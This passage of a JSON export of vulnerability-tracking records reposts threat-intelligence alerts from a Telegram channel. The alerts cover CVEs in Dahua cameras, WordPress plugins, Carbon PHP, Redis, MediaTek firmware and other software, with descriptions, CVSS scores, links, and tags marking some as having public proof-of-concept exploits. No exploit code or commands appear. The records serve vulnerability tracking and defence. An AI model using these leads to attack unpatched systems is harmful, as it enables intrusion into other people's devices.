"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQ22-566F-CFHJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/117", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-fq22-566f-cfhj\n\ud83d\udd17 Aliases: CVE-2024-13130\n\ud83d\udd39 Details: A vulnerability was found in Dahua IPC-HFW1200S, IPC-HFW2300R-Z, IPC-HFW5220E-Z and IPC-HDW1200S up to 20241222. It has been rated as problematic. Affected by this issue is some unknown functionality of the file ../mtd/Config/Sha1Account1 of the component Web Interface. The manipulation leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T03:30:29Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T03:30:29Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-23\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13130\n2. https://netsecfish.notion.site/Path-Traversal-Vulnerability-in-IntelBras-IP-Cameras-mtd-Config-Sha1Account1-and-mtd-Confi-15e6b683e6c80809442ee3425f53b?pvs=4\n3. https://vuldb.com/?ctiid.290204\n4. https://vuldb.com/?id.290204\n5. https://vuldb.com/?submit.464260", "creation_timestamp": "2025-01-05T03:35:57.000000Z"}, {"uuid": "89197808-3a29-412f-9a3a-bdfede6d7d30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVJ8-48RM-VMHR", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/111", "content": "\ud83d\udccc **CVE ID**: GHSA-cvj8-48rm-vmhr\n\ud83d\udd17 **Aliases**: CVE-2024-12221\n\ud83d\udd39 **Details**: The Turnkey bbPress by WeaverTheme plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018_wpnonce\u2019 parameter in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T12:30:32Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T12:30:32Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-79\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12221\n2. https://plugins.trac.wordpress.org/changeset/320943\n3. https://wordpress.org/plugins/weaver-for-bbpress\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/35c608c3-9c28-4e0d-b0ec-d0a29fccd3b?source=cve", "creation_timestamp": "2025-01-05T01:39:23.000000Z"}, {"uuid": "83327855-c438-4016-b5d6-88f65c389c0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3F9-P6HM-5W6Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/840", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22145\n\ud83d\udd39 Description: Carbon is an international PHP extension for DateTime. Application passing unsanitized user input to Carbon::setLocale are at risk of arbitrary file include, if the application allows users to upload files with .php extension in an folder that allows include or require to read it, then they are at risk of arbitrary code ran on their servers. This vulnerability is fixed in 3.8.4 and 2.72.6.\n\ud83d\udccf Published: 2025-01-08T20:40:37.545Z\n\ud83d\udccf Modified: 2025-01-08T20:40:37.545Z\n\ud83d\udd17 References:\n1. https://github.com/CarbonPHP/carbon/security/advisories/GHSA-j3f9-p6hm-5w6q\n2. https://github.com/briannesbitt/Carbon/commit/129700ed449b1f02d70272d2ac802357c8c30c58", "creation_timestamp": "2025-01-08T21:13:58.000000Z"}, {"uuid": "690dbb76-d38d-464c-a96a-bec84f5fed71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5PQJ-PHV8-QXMC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/125", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-5pqj-phv8-qxmc\n\ud83d\udd17 Aliases: CVE-2024-13134\n\ud83d\udd39 Details: A vulnerability, which was classified as critical, was found in ZeroWdd studentmanager 1.0. Affected is the function addTeacher/editTeacher of the file src/main/Java/com/wdd/studentmanager/controller/TeacherController. java. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T09:30:42Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T09:30:42Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-284\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13134\n2. https://github.com/ZeroWdd/studentmanager/issues/16\n3. https://github.com/ZeroWdd/studentmanager/issues/16#issue-2553409\n4. https://vuldb.com/?ctiid.290208\n5. https://vuldb.com/?id.290208\n6. https://vuldb.com/?submit.46916", "creation_timestamp": "2025-01-05T09:36:41.000000Z"}, {"uuid": "73a9d860-09ac-4d3b-89a0-457700e2f730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WHX-V52V-GG25", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/129", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7whx-v52v-gg25\n\ud83d\udd17 Aliases: CVE-2024-13139\n\ud83d\udd39 Details: A vulnerability was found in wangl1989 mysiteforme 1.0. It has been rated as critical. This issue affects the function doContent of the file src/main/java/com/mysiteform/admin/controller/system/FileController. The manipulation of the argument content leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T12:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T12:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-918\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13139\n2. https://github.com/wangl1989/mysiteforme/issues/56\n3. https://github.com/wangl1989/mysiteforme/issues/56#issue-2586365\n4. https://vuldb.com/?ctiid.290213\n5. https://vuldb.com/?id.290213\n6. https://vuldb.com/?submit.468513", "creation_timestamp": "2025-01-05T12:39:43.000000Z"}, {"uuid": "601412a6-ea79-4279-939c-d561b9154808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52QC-Q82V-P8HJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/171", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-52qc-q82v-p8hj\n\ud83d\udd17 Aliases: CVE-2025-22388\n\ud83d\udd39 Details: An issue was discovered in Optimizely EPiServer.CMS.Core before 12.22.0. A high-severity Stored Cross-Site Scripting (XSS) vulnerability exists in the CMS, allowing malicious actors to inject and execute arbitrary JavaScript code, potentially compromising user data, escalating privileges, or executing unauthorized actions. The issue exists in multiple areas, including content editing, link management, and file uploads.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:59Z\n\ud83d\uddd3\ufe0f Published: 2025-01-04T03:33:08Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-22388\n2. https://support.optimizely.com/hc/en-us/articles/331820426055-Content-Management-System-CMS-Security-Advisory-CMS-2025-01", "creation_timestamp": "2025-01-06T15:37:52.000000Z"}, {"uuid": "f436c411-3ffe-4c87-8b27-4591fb1e32bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38HX-X5HQ-5FG4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/229", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34109\n\ud83d\udd39 Description: zxcvbn-ts is an open source password strength estimator written in typescript. This vulnerability affects users running on the nodeJS platform which are using the second argument of the zxcvbn function. It can result in an unbounded resource consumption as the user inputs array is extended with every function call. Browsers are impacted, too but a single user need to do a lot of input changes so that it affects the browser, while the node process gets the inputs of every user of a platform and can be killed that way. This problem has been patched in version 3.0.2. Users are advised to upgrade. Users unable to upgrade should stop using the second argument of the zxcvbn function and use the zxcvbnOptions.setOptions function.\n\ud83d\udccf Published: 2023-06-07T17:11:21.949Z\n\ud83d\udccf Modified: 2025-01-06T20:12:26.819Z\n\ud83d\udd17 References:\n1. https://github.com/zxcvbn-ts/zxcvbn/security/advisories/GHSA-38hx-x5hq-5fg4\n2. https://github.com/zxcvbn-ts/zxcvbn/commit/3f9bed21b5d01f6f6863476822ca857355fba22f", "creation_timestamp": "2025-01-06T20:50:18.000000Z"}, {"uuid": "30ff75b1-9ee4-4e28-a04f-9cc3dc2d179f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRPQ-RH5H-46G9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/240", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-51741\n\ud83d\udd39 Description: Redis is an open source, in-memory database that persists on disk. An authenticated with sufficient privileges may create a malformed ACL selector which, when accessed, triggers a server panic and subsequent denial of service. The problem is fixed in Redis 7.2.7 and 7.4.2.\n\ud83d\udccf Published: 2025-01-06T21:20:19.772Z\n\ud83d\udccf Modified: 2025-01-06T21:20:19.772Z\n\ud83d\udd17 References:\n1. https://github.com/redis/redis/security/advisories/GHSA-prpq-rh5h-46g9", "creation_timestamp": "2025-01-06T21:36:45.000000Z"}, {"uuid": "1dfe90bd-b469-443c-b21a-51ab57157bff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V6JV-P6R8-J78W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/178", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-v6jv-p6r8-j78w\n\ud83d\udd17 Aliases: CVE-2025-21618\n\ud83d\udd39 Details: ### Summary\nOnce a user logins to one browser, all other browsers are logged in without entering password. Even incognito mode.\n\n### Impact\nhigh\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T16:31:16Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T16:31:16Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-287\n\ud83d\udd17 References:\n1. https://github.com/zauberzeug/nicegui/security/advisories/GHSA-v6jv-p6r8-j8w\n2. https://github.com/zauberzeug/nicegui/commit/1621a4ba6a0666b8094362d36623551e651adc1\n3. https://github.com/zauberzeug/nicegui", "creation_timestamp": "2025-01-06T16:37:36.000000Z"}, {"uuid": "136a511a-129a-4fcf-9ba8-bbc1d2db1dee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JW9-7JRJ-WP3F", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/177", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-8jw9-7jrj-wp3f\n\ud83d\udd17 Aliases: CVE-2022-37057\n\ud83d\udd39 Details: D-Link Go-RT-AC750 GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 are vulnerable to Command Injection via cgibin, ssdpcgi_main.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:58Z\n\ud83d\uddd3\ufe0f Published: 2022-08-29T00:00:33Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-77, CWE-78\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2022-305\n2. https://drive.google.com/file/d/1_UUpraFTxxB9ujrgVLQZXQ8Q8M58BAF/view?usp=sharing\n3. https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10308\n4. https://www.dlink.com/en/security-bulletin", "creation_timestamp": "2025-01-06T15:38:50.000000Z"}, {"uuid": "3c89dd8a-9c64-4ff3-aee2-fe404ac4e37a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H8HR-JHCX-FCV9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/587", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22132\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. A Cross-Site Scripting (XSS) vulnerability was identified in the file upload functionality of the WeGIA/html/socio/sistema/controller/controla_xlsx.php endpoint. By uploading a file containing malicious JavaScript code, an attacker can execute arbitrary scripts in the context of a victim's browser. This can lead to information theft, session hijacking, and other forms of client-side exploitation. This vulnerability is fixed in 3.2.7.\n\ud83d\udccf Published: 2025-01-07T22:04:41.805Z\n\ud83d\udccf Modified: 2025-01-07T22:04:41.805Z\n\ud83d\udd17 References:\n1. https://github.com/nilsonLazarin/WeGIA/security/advisories/GHSA-h8hr-jhcx-fcv9\n2. https://github.com/nilsonLazarin/WeGIA/commit/330f641db43cfb0c8ea8bb6025cc0732de4d4d6b", "creation_timestamp": "2025-01-07T22:37:05.000000Z"}, {"uuid": "3d99a497-6a05-4ff7-9081-206ca2cfe7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJGR-2JXV-V8QF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/586", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22133\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. Prior to 3.2.8, a critical vulnerability was identified in the /WeGIA/html/socio/sistema/controller/controla_xlsx.php endpoint. The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as .phar, which can then be executed by the server. This vulnerability is fixed in 3.2.8.\n\ud83d\udccf Published: 2025-01-07T22:07:13.958Z\n\ud83d\udccf Modified: 2025-01-07T22:07:13.958Z\n\ud83d\udd17 References:\n1. https://github.com/nilsonLazarin/WeGIA/security/advisories/GHSA-mjgr-2jxv-v8qf\n2. https://github.com/nilsonLazarin/WeGIA/commit/a08f04de96d3caec85496d7a89a5b82d1960d9dd", "creation_timestamp": "2025-01-07T22:36:49.000000Z"}, {"uuid": "942f04fb-20ab-492b-8275-805afc3b2134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2J38-PJH8-WFXW", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/443", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11681\n\ud83d\udd39 Description: A malicious or compromised MacPorts mirror can execute arbitrary commands as root\u00a0on the machine of a client running port selfupdate\u00a0against the mirror.\n\ud83d\udccf Published: 2025-01-07T14:35:52.723Z\n\ud83d\udccf Modified: 2025-01-07T15:04:25.786Z\n\ud83d\udd17 References:\n1. https://github.com/google/security-research/security/advisories/GHSA-2j38-pjh8-wfxw", "creation_timestamp": "2025-01-07T15:39:03.000000Z"}, {"uuid": "c553b3b3-6ece-4515-aecd-1753e8b95ef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8464-8V52-XM79", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/147", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-8464-8v52-xm79\n\ud83d\udd17 Aliases: CVE-2024-13144\n\ud83d\udd39 Details: A vulnerability classified as critical has been found in zhenfeng13 My-Blog 1.0. Affected is the function uploadFileByEditomd of the file src/main/java/com/site/blog/my/core/controller/admin/BlogController.java. The manipulation of the argument editormd-image-file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T00:30:41Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T00:30:41Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-284\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13144\n2. https://github.com/ZHENFENG13/My-Blog/issues/140\n3. https://github.com/ZHENFENG13/My-Blog/issues/140#issue-259813820\n4. https://vuldb.com/?ctiid.290232\n5. https://vuldb.com/?id.290232\n6. https://vuldb.com/?submit.469220", "creation_timestamp": "2025-01-06T00:35:56.000000Z"}, {"uuid": "cc0d14bc-2a4a-4233-a2a4-56f20a28c9ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7FHF-99F5-2645", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/162", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7fhf-99f5-2645\n\ud83d\udd17 Aliases: CVE-2024-20149\n\ud83d\udd39 Details: In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01231341 / MOLY01263331 / MOLY01233835; Issue ID: MSV-2165.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-1284\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20149\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:38.000000Z"}, {"uuid": "09f9d41a-dbf1-4f56-8ce9-67422362b999", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5669-3G9Q-8X32", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/164", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-5669-3g9q-8x32\n\ud83d\udd17 Aliases: CVE-2024-20105\n\ud83d\udd39 Details: In m4u, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09062027; Issue ID: MSV-1743.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20105\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:42.000000Z"}, {"uuid": "d804dd30-9879-4efd-8873-5b4783b3df67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCH9-MCHM-3M6C", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/154", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-pch9-mchm-3m6c\n\ud83d\udd17 Aliases: CVE-2024-20143\n\ud83d\udd39 Details: In V6 DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS09167056; Issue ID: MSV-2069.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20143\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:24.000000Z"}, {"uuid": "b26ddee1-ebd5-48e6-a552-63b93b0509e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PVVW-QRF9-XPMC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/153", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-pvvw-qrf9-xpmc\n\ud83d\udd17 Aliases: CVE-2024-20140\n\ud83d\udd39 Details: In power, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09270402; Issue ID: MSV-2020.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20140\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:22.000000Z"}, {"uuid": "1ef91a0b-ff6d-4ff7-9dc7-ec1ccdaf5970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVQ7-Q423-52G3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/157", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-fvq7-q423-52g3\n\ud83d\udd17 Aliases: CVE-2024-20146\n\ud83d\udd39 Details: In wlan STA driver, there is a possible out of bounds write due to improper input validation. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00389496 / ALPS09137491; Issue ID: MSV-1835.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20146\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:29.000000Z"}, {"uuid": "aa00e3cf-d23d-4b00-9f4b-41be204d7297", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88JR-VQF8-XRXX", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-88jr-vqf8-xrxx\n\ud83d\udd17 Aliases: CVE-2024-20152\n\ud83d\udd39 Details: In wlan STA driver, there is a possible reachable assertion due to improper exception handling. This could lead to local denial of service if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: WCNCR00389047 / ALPS09136505; Issue ID: MSV-1798.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-617\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20152\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:34.000000Z"}, {"uuid": "dd61d6d1-3671-42de-8791-7f02b4e67617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98MP-FXMM-38QM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/159", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-98mp-fxmm-38qm\n\ud83d\udd17 Aliases: CVE-2024-20145\n\ud83d\udd39 Details: In V6 DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS09290940; Issue ID: MSV-2040.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20145\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:32.000000Z"}, {"uuid": "5781083f-65f7-4331-8eab-064ea5f1f74f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQHV-985J-2FRF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/158", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-cqhv-985j-2frf\n\ud83d\udd17 Aliases: CVE-2024-20148\n\ud83d\udd39 Details: In wlan STA FW, there is a possible out of bounds write due to improper input validation. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00389045 / ALPS09136494; Issue ID: MSV-1796.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20148\n2. 